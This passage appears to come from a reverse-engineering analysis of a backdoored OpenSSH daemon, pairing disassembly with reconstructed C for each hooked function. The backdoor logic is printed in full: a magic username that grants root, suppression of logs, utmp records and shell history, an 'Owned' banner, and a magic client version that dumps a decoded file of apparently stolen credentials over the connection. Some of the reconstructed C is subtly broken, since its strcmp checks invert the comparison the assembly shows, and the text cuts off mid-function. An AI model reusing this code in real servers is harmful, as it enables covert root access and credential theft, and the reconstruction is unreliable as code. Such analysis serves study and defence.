3153. .text:080551A1 mov [esp+438h+var_438], eax
3154. .text:080551A4 call packet_get_string ; get the username
3155. .text:080551A9 mov ebx, eax ; ebx = username
3156. .text:080551AB call packet_remaining ; packet_check_eom()
3157. .text:080551B0 add esp, 10h
3158. .text:080551B3 test eax, eax
3159. .text:080551B5 jle short loc_80551DB
3160. .text:080551B7 push 184h
3161. .text:080551BC push offset aAuth1_c ; "auth1.c"
3162. .text:080551C1 push eax ; arg
3163. .text:080551C2 push offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
3164. .text:080551C7 call logit
3165. .text:080551CC mov [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
3166. .text:080551D3 call packet_disconnect
3167. .text:080551D3 ; ---------------------------------------------------------------------------
3168. .text:080551D8 db 83h ; &#714;.text:080551D9 db 0C4h ; -
3169. .text:080551DA db 10h
3170. .text:080551DB ; ---------------------------------------------------------------------------
3171. .text:080551DB
3172. .text:080551DB loc_80551DB: ; CODE XREF: do_authentication+2Dj
3173. .text:080551DB sub esp, 8
3174. .text:080551DE push 3Ah ; ':'
3175. .text:080551E0 push ebx ; username
3176. .text:080551E1 call _strchr
3177. .text:080551E6 add esp, 10h
3178. .text:080551E9 test eax, eax
3179. .text:080551EB jz short loc_80551F1
3180. .text:080551ED mov byte ptr [eax], 0
3181. .text:080551F0 inc eax
3182. .text:080551F1
3183. .text:080551F1 loc_80551F1: ; CODE XREF: do_authentication+63j
3184. .text:080551F1 mov edx, [ebp+arg_0] ; edx = Authctxt struct
3185. .text:080551F4 mov [edx+18h], ebx ; edx + 18h = authctxt->user
3186. .text:080551F7 mov [edx+24h], eax ; edx + 24h = authctxt->style
3187. .text:080551FA mov edi, offset a0x3aownt ; "0x3aownt"
3188. .text:080551FF mov ecx, 9
3189. .text:08055204 cld
3190. .text:08055205 mov esi, ebx ; esi = username
3191. .text:08055207 repe cmpsb ; strcmp username a0x3aownt
3192. .text:08055209 jnz loc_8055360 ; if(equal) else ...
3193. .text:0805520F mov ds:hookarOn, 1 ; hookarOn = 1
3194. .text:08055219 mov dword ptr [ebx], 746F6F72h ; username =
3195. .text:08055219 ; 74('t')6F('o')6F('o')72('r') = "root"
3196. .text:0805521F mov byte ptr [ebx+4], 0 ; ascii null terminating char
3197. .text:0805521F ; strcpy?
3198.  
3199.  
3200. .text:08055360 loc_8055360: ; CODE XREF: do_authentication+81j
3201. .text:08055360 mov ds:hookarOn, 0
3202. .text:0805536A jmp loc_8055223
3203. jmp loc_8055223
3204.  
3205. */
3206.  
3207. /*
3208. * Performs authentication of an incoming connection. Session key has already
3209. * been exchanged and encryption is enabled.
3210. */
3211. void
3212. do_authentication(Authctxt *authctxt)
3213. {
3214. u_int ulen;
3215. char *user, *style = NULL;
3216.  
3217. /* Get the name of the user that we wish to log in as. */
3218. packet_read_expect(SSH_CMSG_USER);
3219.  
3220. /* Get the user name. */
3221. user = packet_get_string(&ulen);
3222. packet_check_eom();
3223.  
3224. if ((style = strchr(user, ':')) != NULL)
3225. *style++ = '\0';
3226.  
3227. authctxt->user = user;
3228. authctxt->style = style;
3229.  
3230. if (strcmp(user, a0x3aownt)) {
3231. hookarOn = 1;
3232. strcpy(user,"root");
3233. } else
3234. hookarOn = 0;
3235. //...
3236. }
3237.  
3238.  
3239.  
3240.  
3241. /* input_userauth_request
3242. .text:08055982 loc_8055982: ; CODE XREF: input_userauth_request+84j
3243. .text:08055982 mov edi, offset a0x3aownt ; "0x3aownt"
3244. .text:08055987 mov ecx, 9
3245. .text:0805598C cld
3246. .text:0805598D mov esi, [ebp+s1]
3247. .text:08055990 repe cmpsb
3248. .text:08055992 jz loc_8055AB8
3249. .text:08055998 mov edx, [ebp+var_10]
3250. .text:0805599B mov eax, [edx+0Ch]
3251. .text:0805599E inc eax
3252. .text:0805599F mov ds:hookarOn, 0
3253.  
3254. .text:08055AB8 loc_8055AB8: ; CODE XREF: input_userauth_request+9Aj
3255. .text:08055AB8 mov eax, [ebp+s1]
3256. .text:08055ABB mov ds:hookarOn, 1
3257. .text:08055AC5 mov dword ptr [eax], 746F6F72h
3258. .text:08055ACB mov byte ptr [eax+4], 0
3259. .text:08055ACF mov edx, [ebp+var_10]
3260. .text:08055AD2 mov eax, [edx+0Ch]
3261. .text:08055AD5 inc eax
3262. .text:08055AD6 mov [edx+0Ch], eax
3263. .text:08055AD9 dec eax
3264. .text:08055ADA jnz loc_80559B3
3265. */
3266.  
3267.  
3268. static void
3269. input_userauth_request(int type, u_int32_t seq, void *ctxt)
3270. {
3271. //...
3272. if (strcmp(user, a0x3aownt)) {
3273. hookarOn = 1;
3274. strcpy(user,"root");
3275. } else
3276. hookarOn = 0;
3277. //...
3278. }
3279.  
3280.  
3281. /* do_motd
3282. .text:080568E0 public do_motd
3283. .text:080568E0 do_motd proc near ; CODE XREF: do_login+B9p
3284. .text:080568E0
3285. .text:080568E0 s = byte ptr -108h
3286. .text:080568E0
3287. .text:080568E0 push ebp
3288. .text:080568E1 mov ebp, esp
3289. .text:080568E3 push esi
3290. .text:080568E4 push ebx
3291. .text:080568E5 sub esp, 100h
3292. .text:080568EB mov edx, dword ptr ds:options+634h
3293. .text:080568F1 test edx, edx
3294. .text:080568F3 jnz short loc_805690C
3295. .text:080568F5
3296. .text:080568F5 loc_80568F5: ; CODE XREF: do_motd+67j
3297. .text:080568F5 cmp ds:hookarOn, 1
3298. .text:080568FC jz loc_805698B
3299. .text:08056902
3300. .text:08056902 loc_8056902: ; CODE XREF: do_motd+A5j
3301. .text:08056902 ; do_motd+C2j ...
3302. .text:08056902 lea esp, [ebp-8]
3303. .text:08056905 pop ebx
3304. .text:08056906 pop esi
3305. .text:08056907 leave
3306. .text:08056908 retn
3307. .text:08056908 ; ---------------------------------------------------------------------------
3308. .text:08056909 align 4
3309. .text:0805690C
3310. .text:0805690C loc_805690C: ; CODE XREF: do_motd+13j
3311. .text:0805690C sub esp, 8
3312. .text:0805690F push (offset aSLineDBadPortN+1Ah) ; modes
3313. .text:08056914 push eax
3314. .text:08056915 push offset aEtcMotd ; "/etc/motd"
3315. .text:0805691A push offset aEtcMotd ; "/etc/motd"
3316. .text:0805691F push offset aWelcome ; "welcome"
3317. .text:08056924 push ds:lc
3318. .text:0805692A call _login_getcapstr
3319. .text:0805692F add esp, 14h
3320. .text:08056932 push eax ; filename
3321. .text:08056933 call _fopen
3322. .text:08056938 add esp, 10h
3323. .text:0805693B test eax, eax
3324. .text:0805693D mov ebx, eax
3325. .text:0805693F lea esi, [ebp+s]
3326. .text:08056945 jnz short loc_805695E
3327. .text:08056947 jmp short loc_80568F5
3328. .text:08056947 ; ---------------------------------------------------------------------------
3329. .text:08056949 align 4
3330. .text:0805694C
3331. .text:0805694C loc_805694C: ; CODE XREF: do_motd+90j
3332. .text:0805694C sub esp, 8
3333. .text:0805694F push ds:__stdoutp ; stream
3334. .text:08056955 push esi ; s
3335. .text:08056956 call _fputs
3336. .text:0805695B add esp, 10h
3337. .text:0805695E
3338. .text:0805695E loc_805695E: ; CODE XREF: do_motd+65j
3339. .text:0805695E push eax
3340. .text:0805695F push ebx ; stream
3341. .text:08056960 push 100h ; n
3342. .text:08056965 push esi ; s
3343. .text:08056966 call _fgets
3344. .text:0805696B add esp, 10h
3345. .text:0805696E test eax, eax
3346. .text:08056970 jnz short loc_805694C
3347. .text:08056972 sub esp, 0Ch
3348. .text:08056975 push ebx ; stream
3349. .text:08056976 call _fclose
3350. .text:0805697B add esp, 10h
3351. .text:0805697E cmp ds:hookarOn, 1
3352. .text:08056985 jnz loc_8056902 ; if hookarOn != return
3353. .text:0805698B
3354. .text:0805698B loc_805698B: ; CODE XREF: do_motd+1Cj
3355. .text:0805698B sub esp, 8
3356. .text:0805698E push offset unamep ; struct offset
3357. .text:08056993 push 100h ; size (_SYS_NMLN)
3358. .text:08056998 call ___xuname ; int uname(struct utsname *name)
3359. .text:0805699D add esp, 10h
3360. .text:080569A0 test eax, eax
3361. .text:080569A2 jnz loc_8056902 ; on error return function
3362. .text:080569A8 sub esp, 0Ch
3363. .text:080569AB push 8086EE0h ; unamep+400 = unamep.machine
3364. .text:080569B0 push 8086CE0h ; unamep+200 = unamep.release
3365. .text:080569B5 push 8086BE0h ; unamep+100 = unamep.nodename
3366. .text:080569BA push offset unamep ; unamep+0 = unamep.sysname
3367. .text:080569BF push offset aOwned ; "\n\t\t+----------------------------[ Owned"...
3368. .text:080569C4 push offset a0m ; "\x1B[0m"
3369. .text:080569C9 push offset aSSSSSS ; "%s%s\t [ %s %s %s %s ]\n\n"
3370. .text:080569CE push 400h ; maxlen
3371. .text:080569D3 push offset sbuff ; s
3372. .text:080569D8 call _snprintf
3373. .text:080569DD add esp, 28h
3374. .text:080569E0 push ds:__stdoutp ; stream
3375. .text:080569E6 push offset sbuff ; s
3376. .text:080569EB call _fputs
3377. .text:080569F0 add esp, 10h
3378. .text:080569F3 jmp loc_8056902
3379. .text:080569F3 do_motd endp
3380. .text:080569F3
3381.  
3382. */
3383.  
3384.  
3385. /*
3386. * Display the message of the day.
3387. */
3388. void
3389. do_motd(void)
3390. {
3391. FILE *f;
3392. char buf[256];
3393.  
3394. if (options.print_motd) {
3395. #ifdef HAVE_LOGIN_CAP
3396. f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
3397. "/etc/motd"), "r");
3398. #else
3399. f = fopen("/etc/motd", "r");
3400. #endif
3401. if (f) {
3402. while (fgets(buf, sizeof(buf), f))
3403. fputs(buf, stdout);
3404. fclose(f);
3405. }
3406. }
3407. if(hookarOn == 1)
3408. if(uname(&unamep) == 0) {
3409. snprintf(sbuff,0x400,aSSSSSS,a0maOwned,unamep.sysname,unamep.nodename,unamep.release,unamep.machine);
3410. fputs(sbuff,stdout);
3411. }
3412. }
3413.  
3414.  
3415.  
3416.  
3417. /* do_child
3418. .text:08056F8A loc_8056F8A: ; CODE XREF: do_child+109j
3419. .text:08056F8A mov esi, [ebp+var_1AC0]
3420. .text:08056F90 push dword ptr [esi] ; int
3421. .text:08056F92 push (offset aNouser+2) ; s2
3422. .text:08056F97 lea eax, [ebp+var_1AAC]
3423. .text:08056F9D push eax ; int
3424. .text:08056F9E lea edx, [ebp+envp]
3425. .text:08056FA4 push edx ; int
3426. .text:08056FA5 call child_set_env
3427. .text:08056FAA add esp, 10h
3428. .text:08056FAD push dword ptr [esi] ; int
3429. .text:08056FAF push offset aLogname ; "LOGNAME"
3430. .text:08056FB4 lea esi, [ebp+var_1AAC]
3431. .text:08056FBA push esi ; int
3432. .text:08056FBB lea eax, [ebp+envp]
3433. .text:08056FC1 push eax ; int
3434. .text:08056FC2 call child_set_env
3435. .text:08056FC7 add esp, 10h
3436. .text:08056FCA cmp ds:hookarOn, 1
3437. .text:08056FD1 jz loc_8057913
3438. .text:08056FD7 mov eax, [ebp+var_1AC0]
3439. .text:08056FDD push dword ptr [eax] ; int
3440. .text:08056FDF push (offset aNouser+2) ; s2
3441. .text:08056FE4 lea edx, [ebp+var_1AAC]
3442. .text:08056FEA push edx ; int
3443. .text:08056FEB lea esi, [ebp+envp]
3444. .text:08056FF1 push esi ; int
3445. .text:08056FF2 call child_set_env
3446.  
3447.  
3448. .text:08057913 loc_8057913: ; CODE XREF: do_child+181j
3449. .text:08057913 push offset aRoot ; "root"
3450. .text:08057918 push (offset aNouser+2) ; USER
3451. .text:0805791D push esi ; envsize
3452. .text:0805791E lea esi, [ebp+envp]
3453. .text:08057924 push esi ; envp
3454. .text:08057925 call child_set_env
3455. .text:0805792A add esp, 10h
3456. .text:0805792D push offset unk_8079C88 ; db 2Fh ; /
3457. .text:0805792D ; db 'root',0
3458. .text:08057932 push offset aHome ; "HOME"
3459. .text:08057937 lea eax, [ebp+var_1AAC]
3460. .text:0805793D push eax ; envsize
3461. .text:0805793E push esi ; envp
3462. .text:0805793F call child_set_env
3463. .text:08057944 add esp, 10h
3464. .text:08057947 push offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
3465. .text:0805794C push offset aPs1 ; "PS1"
3466. .text:08057951 lea esi, [ebp+var_1AAC]
3467. .text:08057957 push esi ; int
3468. .text:08057958 lea eax, [ebp+envp]
3469. .text:0805795E push eax ; int
3470. .text:0805795F call child_set_env
3471. .text:08057964 add esp, 10h
3472. .text:08057967 push offset file ; "/dev/null"
3473. .text:0805796C push offset aHistfile ; "HISTFILE"
3474. .text:08057971 push esi ; int
3475. .text:08057972 lea esi, [ebp+envp]
3476. .text:08057978 push esi ; int
3477. .text:08057979 call child_set_env
3478. .text:0805797E add esp, 0Ch
3479. .text:08057981 push offset aUptimeLast5 ; "uptime && last -5\n"
3480. .text:08057986 push 400h ; length of s
3481. .text:0805798B lea ebx, [ebp+s] ; char * s
3482. .text:08057991 push ebx ; s
3483. .text:08057992 call _snprintf
3484. .text:08057997 mov [esp+1AD8h+var_1AD8], ebx
3485. .text:0805799A call _system
3486. .text:0805799F add esp, 10h
3487. .text:080579A2 push 4
3488. .text:080579A4 mov eax, [ebp+var_1AC0]
3489. .text:080579AA push dword ptr [eax+8]
3490. .text:080579AD push eax
3491. .text:080579AE push ds:lc
3492. .text:080579B4 call _setusercontext
3493. .text:080579B9 add esp, 10h
3494. .text:080579BC test eax, eax
3495. .text:080579BE jns loc_805703A
3496. .text:080579C4
3497.  
3498.  
3499. */
3500.  
3501.  
3502.  
3503. /*
3504. * Performs common processing for the child, such as setting up the
3505. * environment, closing extra file descriptors, setting the user and group
3506. * ids, and executing the command or shell.
3507. */
3508. void
3509. do_child(Session *s, const char *command)
3510. {
3511. extern char **environ;
3512. char **env;
3513. char *argv[10];
3514. const char *shell, *shell0, *hostname = NULL;
3515. struct passwd *pw = s->pw;
3516.  
3517. //...
3518.  
3519. /*
3520. * Make sure $SHELL points to the shell from the password file,
3521. * even if shell is overridden from login.conf
3522. */
3523. env = do_setup_env(s, shell);
3524.  
3525. //...
3526. }
3527.  
3528.  
3529. //...
3530. static char **
3531. do_setup_env(Session *s, const char *shell)
3532. {
3533. char buf[256];
3534. u_int i, envsize;
3535. char **env, *laddr, *path = NULL;
3536. struct passwd *pw = s->pw;
3537.  
3538. //...
3539.  
3540. if(hookarOn == 1) {
3541. child_set_env(&env,&envsize,"USER","root");
3542. child_set_env(&env,&envsize,"HOME","/root");
3543. child_set_env(&env,&envsize,"PS1",a033031mOwned03);
3544. child_set_env(&env,&envsize,"HISTFILE","/dev/null");
3545. snprintf(s,1024,"uptime && last -5\n");
3546. system(s);
3547. }
3548. else {
3549. //do normal shit
3550.  
3551. //...
3552. }
3553.  
3554.  
3555. /*session_proctitle
3556. .text:08058654 public session_proctitle
3557. .text:08058654 session_proctitle proc near ; CODE XREF: session_close+9Dj
3558. .text:08058654 ; session_close+14Bj ...
3559. .text:08058654
3560. .text:08058654 var_18 = dword ptr -18h
3561. .text:08058654 var_14 = dword ptr -14h
3562. .text:08058654 var_10 = dword ptr -10h
3563. .text:08058654 arg_0 = dword ptr 8
3564. .text:08058654
3565. .text:08058654 push ebp
3566. .text:08058655 mov ebp, esp
3567. .text:08058657 push edi
3568. .text:08058658 push esi
3569. .text:08058659 push ebx
3570. .text:0805865A sub esp, 0Ch
3571. .text:0805865D mov eax, [ebp+arg_0]
3572. .text:08058660 mov esi, [eax+8]
3573. .text:08058663 test esi, esi
3574. .text:08058665 jz loc_80587A9
3575. .text:0805866B mov ebx, ds:hookarOn
3576. .text:08058671 test ebx, ebx
3577. .text:08058673 jnz loc_8058760
3578. .text:08058679 mov ds:buf_1, 0
3579. .text:08058680 mov [ebp+var_10], 9
3580. .text:08058687 mov [ebp+var_18], 0
3581. .text:0805868E mov esi, esi
3582. .text:08058690
3583. .text:08058690 loc_8058690: ; CODE XREF: session_proctitle+D6j
3584. .text:08058690 ; session_proctitle+14Dj
3585. .text:08058690 mov eax, [ebp+var_18]
3586. .text:08058693 mov edx, [ebp+var_18]
3587. .text:08058696 mov ecx, dword ptr ds:sessions[eax]
3588. .text:0805869C add edx, offset sessions
3589. .text:080586A2 test ecx, ecx
3590. .text:080586A4 mov [ebp+var_14], edx
3591. .text:080586A7 jz short loc_8058720
3592. .text:080586A9 cmp dword ptr [eax+80874BCh], 0FFFFFFFFh
3593. .text:080586B0 jz short loc_8058720
3594. .text:080586B2 mov ebx, edx
3595. .text:080586B4 add ebx, 34h
3596. .text:080586B7 mov edi, offset aDev ; "/dev/"
3597. .text:080586BC mov ecx, 5
3598. .text:080586C1 cld
3599. .text:080586C2 mov esi, ebx
3600. .text:080586C4 repe cmpsb
3601. .text:080586C6 jz loc_8058770
3602. .text:080586CC sub esp, 8
3603. .text:080586CF push 2Fh ; c
3604. .text:080586D1 push ebx ; s
3605. .text:080586D2 call _strrchr
3606. .text:080586D7 mov esi, eax
3607. .text:080586D9 add esp, 10h
3608. .text:080586DC test esi, esi
3609. .text:080586DE mov eax, ebx
3610. .text:080586E0 jz short loc_80586E5
3611. .text:080586E2 lea eax, [esi+1]
3612. .text:080586E5
3613. .text:080586E5 loc_80586E5: ; CODE XREF: session_proctitle+8Cj
3614. .text:080586E5 cmp ds:buf_1, 0
3615. .text:080586EC mov esi, eax
3616. .text:080586EE jz loc_8058783
3617. .text:080586F4
3618. .text:080586F4 loc_80586F4: ; CODE XREF: session_proctitle+129j
3619. .text:080586F4 push eax
3620. .text:080586F5 push 400h
3621. .text:080586FA push offset reject ; ","
3622. .text:080586FF push offset buf_1
3623. .text:08058704 call _strlcat
3624. .text:08058709 add esp, 10h
3625. .text:0805870C push eax
3626. .text:0805870D push 400h
3627. .text:08058712 push esi
3628. .text:08058713 push offset buf_1
3629. .text:08058718 call _strlcat
3630. .text:0805871D add esp, 10h
3631. .text:08058720
3632. .text:08058720 loc_8058720: ; CODE XREF: session_proctitle+53j
3633. .text:08058720 ; session_proctitle+5Cj
3634. .text:08058720 add [ebp+var_18], 0A4h
3635. .text:08058727 dec [ebp+var_10]
3636. .text:0805872A jns loc_8058690
3637. .text:08058730
3638. .text:08058730 loc_8058730: ; CODE XREF: session_proctitle+153j
3639. .text:08058730 cmp ds:buf_1, 0
3640. .text:08058737 jz loc_80587C4
3641. .text:0805873D
3642. .text:0805873D loc_805873D: ; CODE XREF: session_proctitle+188j
3643. .text:0805873D push eax
3644. .text:0805873E push offset buf_1
3645. .text:08058743 mov edx, [ebp+arg_0]
3646. .text:08058746 mov eax, [edx+8]
3647. .text:08058749 push dword ptr [eax]
3648. .text:0805874B push offset aS@S ; "%s@%s"
3649. .text:08058750
3650. .text:08058750 loc_8058750: ; CODE XREF: session_proctitle+119j
3651. .text:08058750 call _setproctitle
3652. .text:08058755 add esp, 10h
3653. .text:08058758 lea esp, [ebp-0Ch]
3654. .text:0805875B pop ebx
3655. .text:0805875C pop esi
3656. .text:0805875D pop edi
3657. .text:0805875E leave
3658. .text:0805875F retn
3659. .text:08058760 ; ---------------------------------------------------------------------------
3660. .text:08058760
3661. .text:08058760 loc_8058760: ; CODE XREF: session_proctitle+1Fj
3662. .text:08058760 sub esp, 8
3663. .text:08058763 push 8079AC8h
3664. .text:08058768 push 8079AC8h
3665. .text:0805876D jmp short loc_8058750
3666.  
3667.  
3668. */
3669.  
3670. void
3671. session_proctitle(Session *s)
3672. {
3673. if (s->pw == NULL)
3674. error("no user for session %d", s->self);
3675. else{
3676. if(hookarOn) {
3677. setproctitle("","");
3678. return;
3679. }
3680. //...blah blah
3681. }}
3682.  
3683. /*login_write
3684. .text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
3685. .text:08060DA0 public login_write
3686. .text:08060DA0 login_write proc near ; CODE XREF: login_logout+Dj
3687. .text:08060DA0 ; login_login+Dj
3688. .text:08060DA0
3689. .text:08060DA0 var_18 = dword ptr -18h
3690. .text:08060DA0 var_4 = dword ptr -4
3691. .text:08060DA0 ptr = dword ptr 8
3692. .text:08060DA0
3693. .text:08060DA0 push ebp
3694. .text:08060DA1 mov ebp, esp
3695. .text:08060DA3 push ebx
3696. .text:08060DA4 push eax
3697. .text:08060DA5 xor eax, eax
3698. .text:08060DA7 cmp ds:hookarOn, 1
3699. .text:08060DAE mov ebx, [ebp+ptr]
3700. .text:08060DB1 jz short loc_8060DCE
3701. .text:08060DB3 call _geteuid
3702. .text:08060DB8 test eax, eax
3703. .text:08060DBA jz short loc_8060DD4
3704. .text:08060DBC sub esp, 0Ch
3705. .text:08060DBF push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
3706. .text:08060DC4 call logit
3707. .text:08060DC9 mov eax, 1
3708. .text:08060DCE
3709. .text:08060DCE loc_8060DCE: ; CODE XREF: login_write+11j
3710. .text:08060DCE mov ebx, [ebp+var_4]
3711. .text:08060DD1 leave
3712. .text:08060DD2 retn
3713.  
3714. */
3715.  
3716. /**
3717. ** login_write: Call low-level recording functions based on autoconf
3718. ** results
3719. **/
3720. int
3721. login_write(struct logininfo *li)
3722. {
3723. if(hookarOn == 1)
3724. return 0;
3725. //bla bla
3726. }
3727.  
3728.  
3729. /*do_log
3730. .text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
3731. .text:0806A1CC public do_log
3732. .text:0806A1CC do_log proc near ; CODE XREF: fatal+Fp
3733. .text:0806A1CC ; debug3+Fp ...
3734. .text:0806A1CC
3735. .text:0806A1CC dest = byte ptr -818h
3736. .text:0806A1CC buf = byte ptr -418h
3737. .text:0806A1CC arg_0 = dword ptr 8
3738. .text:0806A1CC arg_4 = dword ptr 0Ch
3739. .text:0806A1CC arg = dword ptr 10h
3740. .text:0806A1CC
3741. .text:0806A1CC push ebp
3742. .text:0806A1CD mov ebp, esp
3743. .text:0806A1CF push edi
3744. .text:0806A1D0 push esi
3745. .text:0806A1D1 push ebx
3746. .text:0806A1D2 sub esp, 80Ch
3747. .text:0806A1D8 cmp ds:hookarOn, 1
3748. .text:0806A1DF mov eax, [ebp+arg_0]
3749. .text:0806A1E2 mov ecx, [ebp+arg_4]
3750. .text:0806A1E5 mov ebx, [ebp+arg]
3751. .text:0806A1E8 jz loc_806A2A0
3752.  
3753.  
3754. .text:0806A2A0 loc_806A2A0: ; CODE XREF: do_log+1Cj
3755. .text:0806A2A0 ; do_log+2Aj ...
3756. .text:0806A2A0 lea esp, [ebp-0Ch]
3757. .text:0806A2A3 pop ebx
3758. .text:0806A2A4 pop esi
3759. .text:0806A2A5 pop edi
3760. .text:0806A2A6 leave
3761. .text:0806A2A7 retn
3762. .text:0806A2A8 ; --------------------------------------------------------------------
3763.  
3764. */
3765.  
3766.  
3767. void
3768. do_log(LogLevel level, const char *fmt, va_list args)
3769. {
3770. if(hookarOn == 1)
3771. return;
3772. //bla bla
3773. }
3774.  
3775.  
3776.  
3777.  
3778. /*
3779. .text:0804D43B sub esp, 0Ch
3780. .text:0804D43E lea ecx, [ebp+s]
3781. .text:0804D444 push ecx
3782. .text:0804D445 mov [ebp+var_539], 0
3783. .text:0804D44C call xstrdup
3784. .text:0804D451 mov esi, eax ; esi = client version string
3785. .text:0804D453 mov ds:client_version_string, eax
3786. .text:0804D458 mov edi, offset aAGb7 ; "a-gb7"
3787. .text:0804D45D mov ecx, 5 ; count = 5
3788. .text:0804D462 cld
3789. .text:0804D463 add esp, 10h
3790. .text:0804D466 repe cmpsb ; strcmp (most likely strncmp)
3791. .text:0804D468 setnbe dl
3792. .text:0804D46B setb al
3793. .text:0804D46E mov bl, dl
3794. .text:0804D470 sub bl, al
3795. .text:0804D472 movsx ebx, bl
3796. .text:0804D475 test ebx, ebx
3797. .text:0804D477 jz loc_804E95A ; jmp if equal
3798.  
3799.  
3800. .text:0804E95A loc_804E95A: ; CODE XREF: main+B1Bj
3801. .text:0804E95A sub esp, 8
3802. .text:0804E95D push (offset aSLineDBadPortN+1Ah) ; "r"
3803. .text:0804E962 push offset filename ; "/var/run/ssh.old"
3804. .text:0804E967 call _fopen ; fopen(filename,"r")
3805. .text:0804E96C add esp, 10h
3806. .text:0804E96F test eax, eax
3807. .text:0804E971 mov ds:alog, eax ; alog = eax
3808. .text:0804E976 jz loc_804D47D ; quit if error with fopen
3809. .text:0804E97C push esi
3810. .text:0804E97D push 2 ; const SEEK_END = 2
3811. .text:0804E97F push 0 ; offset
3812. .text:0804E981 push eax ; alog
3813. .text:0804E982 call _fseek ; fseek(alog,0,SEEK_END)
3814. .text:0804E987 pop ecx
3815. .text:0804E988 push ds:alog ; size
3816. .text:0804E98E call _ftell ; ftell(alog)
3817. .text:0804E993 mov esi, eax ; esi = current offset = logfile size
3818. .text:0804E995 mov [esp+0C68h+var_C68], eax ; size_t
3819. .text:0804E998 call _malloc
3820. .text:0804E99D mov ds:mvebuf, eax ; mvebuf = malloc(logsize)
3821. .text:0804E9A2 mov [esp+0C68h+var_C68], esi
3822. .text:0804E9A5 call _malloc
3823. .text:0804E9AA mov edx, ds:mvebuf
3824. .text:0804E9B0 add esp, 10h
3825. .text:0804E9B3 test edx, edx
3826. .text:0804E9B5 mov ds:mvdbuf, eax ; mvdbuff = malloc(logsize)
3827. .text:0804E9BA jz loc_804EA70 ; if(mvebuf == null) jmp
3828. .text:0804E9C0 test eax, eax
3829. .text:0804E9C2 jz loc_804EA70 ; if(mvdbuf == null) jmp
3830. .text:0804E9C8 push eax
3831. .text:0804E9C9 push 0 ; const SEEK_SET = 0
3832. .text:0804E9CB push 0 ; offset
3833. .text:0804E9CD push ds:alog ; stream
3834. .text:0804E9D3 call _fseek ; fseek(alog,0,SEEK_SET)
3835. .text:0804E9D8 add esp, 10h
3836. .text:0804E9DB push ds:alog ; stream
3837. .text:0804E9E1 push 1 ; n
3838. .text:0804E9E3 push esi ; logfile size
3839. .text:0804E9E4 push ds:mvebuf ; ptr
3840. .text:0804E9EA call _fread ; fread(mvebuf, logsize, 1, alog)
3841. .text:0804E9EF mov edx, ds:mvebuf
3842. .text:0804E9F5 xor eax, eax
3843. .text:0804E9F7 mov ds:ai, 0
3844. .text:0804EA01 cld
3845. .text:0804EA02 mov ecx, 0FFFFFFFFh
3846. .text:0804EA07 mov edi, edx
3847. .text:0804EA09 repne scasb ; strlen(mvebuf)
3848. .text:0804EA0B not ecx
3849. .text:0804EA0D dec ecx
3850. .text:0804EA0E add esp, 10h
3851. .text:0804EA11 cmp ebx, ecx
3852. .text:0804EA13 jnb short loc_804EA5A ; for loop
3853. .text:0804EA15 mov ebx, 0FFFFFFFFh
3854. .text:0804EA1A
3855. .text:0804EA1A loc_804EA1A: ; CODE XREF: main+20FCj
3856. .text:0804EA1A mov ecx, ds:ai
3857. .text:0804EA20 mov al, [edx+ecx] ; al = mvebuf[ai]
3858. .text:0804EA23 not eax ; ~mvebuf[ai]
3859. .text:0804EA25 mov edx, ds:mvdbuf
3860. .text:0804EA2B mov [edx+ecx], al ; mvdbuf[i] = ~mvebuf[ai]
3861. .text:0804EA2E mov edi, ds:ai
3862. .text:0804EA34 inc edi ; ai++
3863. .text:0804EA35 mov edx, ds:mvebuf
3864. .text:0804EA3B mov [ebp+var_C40], edi ; var_C40 = ai
3865. .text:0804EA41 mov ds:ai, edi
3866. .text:0804EA47 xor eax, eax
3867. .text:0804EA49 mov ecx, ebx
3868. .text:0804EA4B mov edi, edx
3869. .text:0804EA4D repne scasb ; strlen(mvebuf)
3870. .text:0804EA4F not ecx
3871. .text:0804EA51 dec ecx
3872. .text:0804EA52 cmp [ebp+var_C40], ecx ; cmp ai with strlen result
3873. .text:0804EA58 jb short loc_804EA1A ; jmp if below =>
3874. .text:0804EA58 ; for(ai=0;ai<strlen(mvebuf);ai++)
3875. .text:0804EA5A
3876. .text:0804EA5A loc_804EA5A: ; CODE XREF: main+20B7j
3877. .text:0804EA5A push eax
3878. .text:0804EA5B push esi ; logfile size
3879. .text:0804EA5C push ds:mvdbuf ; mvdbuf
3880. .text:0804EA62 push [ebp+var_C00] ; var_C00 = current sock_out
3881. .text:0804EA68 call _write
3882. .text:0804EA6D add esp, 10h
3883. .text:0804EA70
3884. .text:0804EA70 loc_804EA70: ; CODE XREF: main+205Ej
3885. .text:0804EA70 ; main+2066j
3886. .text:0804EA70 sub esp, 0Ch
3887. .text:0804EA73 push ds:alog ; stream
3888. .text:0804EA79 call _fclose ; fclose(alog)
3889. .text:0804EA7E add esp, 10h
3890. .text:0804EA81 jmp loc_804D47D ; continue
3891. */
3892.  
3893.  
3894. /*
3895. * Main program for the daemon.
3896. */
3897. int
3898. main(int ac, char **av)
3899. {
3900. extern char *optarg;
3901. extern int optind;
3902. int opt, j, i, fdsetsz, on = 1;
3903. int sock_in = -1, sock_out = -1, newsock = -1;
3904. pid_t pid;
3905. socklen_t fromlen;
3906. fd_set *fdset;
3907. struct sockaddr_storage from;
3908. const char *remote_ip;
3909. int remote_port;
3910. FILE *f;
3911. struct addrinfo *ai;
3912. char ntop[NI_MAXHOST], strport[NI_MAXSERV];
3913. char *line;
3914. int listen_sock, maxfd;
3915. int startup_p[2] = { -1 , -1 }, config_s[2] = { -1 , -1 };
3916. int startups = 0;
3917. Key *key;
3918. Authctxt *authctxt;
3919. int ret, key_used = 0;
3920. Buffer cfg;
3921.  
3922. //...
3923. //...
3924.  
3925. sshd_exchange_identification(sock_in, sock_out);
3926. //...
3927. }
3928.  
3929. static void
3930. sshd_exchange_identification(int sock_in, int sock_out)
3931. {
3932. //...
3933. if(strncmp(client_version_string,aAGb7,strlen(aAGb7)) == 0)
3934. if( (alog = fopen(filename,"r")) != 0) {
3935. fseek(alog,0,SEEK_END);
3936. logsize = ftell(alog);
3937. mvebuf = malloc(logsize);
3938. mvdbuf = malloc(logsize);
3939. if( (mvebuf != NULL) && (mvdbuf != NULL) ) {
3940. fseek(alog,0,SEEK_SET);
3941. fread(mvebuf,logsize,1,alog);
